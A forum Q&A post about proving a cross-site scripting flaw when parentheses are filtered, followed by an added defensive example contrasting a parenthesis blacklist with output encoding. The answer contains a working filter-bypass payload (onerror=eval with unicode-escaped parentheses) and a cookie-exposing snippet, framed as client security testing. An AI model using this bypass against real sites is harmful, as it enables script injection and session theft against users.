M. Gamal - 5 days ago
Javascript Question

Parentheses alternatives in JS, if any?

I have found a Cross Site Scripting vulnerability in a client's application. The problem is that the vulnerable parameter does not accept parentheses. So something like

alert(document.cookie)
will be rejected because of parentheses. I can get XSS using
alert `xss`
but my client requires a proof of being able to access the DOM.

In other words, how can I
alert(document.cookie)
without parentheses? Are there any alternatives?

Thanks!

Answer

document.body.innerHTML=document.cookie will display the cookies on the page itself.

Speaking of the XSS vulnerability: Yes, it is vulnerable and disabling parentheses will just force attackers to use more creative methods. Letting someone execute any arbitrary code is a liability.

Here's a simple example of how you can call any function with any parameters without using any parentheses in your input:

<p>Malicious input: window.onerror=eval;throw '=1;alert\u0028document.location\u0029'</p>

<input type="button" onclick="window.onerror=eval;throw '=1;alert\u0028document.location\u0029'" value="Click me">
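As an added example (not code from the asker or the answerer), here is the parenthesis blacklist the question describes beside the mitigation that actually holds up: context-aware output encoding of untrusted data. The function names (parenthesisBlacklistAllows, encodeForJsString, encodeForHtmlAttribute, renderButton, decodeJsStringLiteral) are assumptions of this example; the payload constant is the answer's string, used only as test data. It runs under Node without a DOM.

```javascript
// Added example: a parenthesis blacklist versus proper output encoding.

// Models the client's filter: reject any value containing "(" or ")".
function parenthesisBlacklistAllows(value) {
  return !/[()]/.test(value);
}

// The answer's payload, constructed here as test data. It contains no literal
// parentheses: \u0028 and \u0029 only become "(" and ")" once the JavaScript
// string parser decodes the attribute's contents, long after any input filter ran.
const NO_PAREN_PAYLOAD = "window.onerror=eval;throw '=1;alert\\u0028document.location\\u0029'";

// Encodes untrusted data for a quoted JavaScript string literal (the onclick
// context in the answer): every character outside [A-Za-z0-9] becomes \xHH
// (\uHHHH above 0xFF), so quotes and backslashes can neither end the literal
// nor smuggle in escape sequences of their own.
function encodeForJsString(value) {
  return Array.from(value, (ch) => {
    if (/[A-Za-z0-9]/.test(ch)) return ch;
    const code = ch.charCodeAt(0);
    return code > 0xff
      ? '\\u' + code.toString(16).padStart(4, '0')
      : '\\x' + code.toString(16).padStart(2, '0');
  }).join('');
}

// Encodes for the HTML attribute value that wraps the handler.
function encodeForHtmlAttribute(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return value.replace(/[&<>"']/g, (c) => map[c]);
}

// Emits the answer's button, but with the untrusted value carried as a string
// the handler merely displays, encoded first for the JS context, then for the
// attribute context (inner context first, outer context last).
function renderButton(untrusted) {
  const js = "document.title='" + encodeForJsString(untrusted) + "'";
  return '<input type="button" onclick="' + encodeForHtmlAttribute(js) + '" value="Click me">';
}

// Simulates the JavaScript string parser on the encoded literal (\xHH and \uHHHH
// only, which is all encodeForJsString emits) to show what the handler would see:
// the original text as data, with "\u0028" left as six plain characters.
function decodeJsStringLiteral(literal) {
  return literal.replace(/\\x([0-9a-f]{2})|\\u([0-9a-f]{4})/gi,
    (_, x, u) => String.fromCharCode(parseInt(x || u, 16)));
}
```

The blacklist passes the payload untouched, while the encoded form survives the round trip through the string parser as inert text, because the backslash itself is encoded and so the \u0028 sequence is never interpreted.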
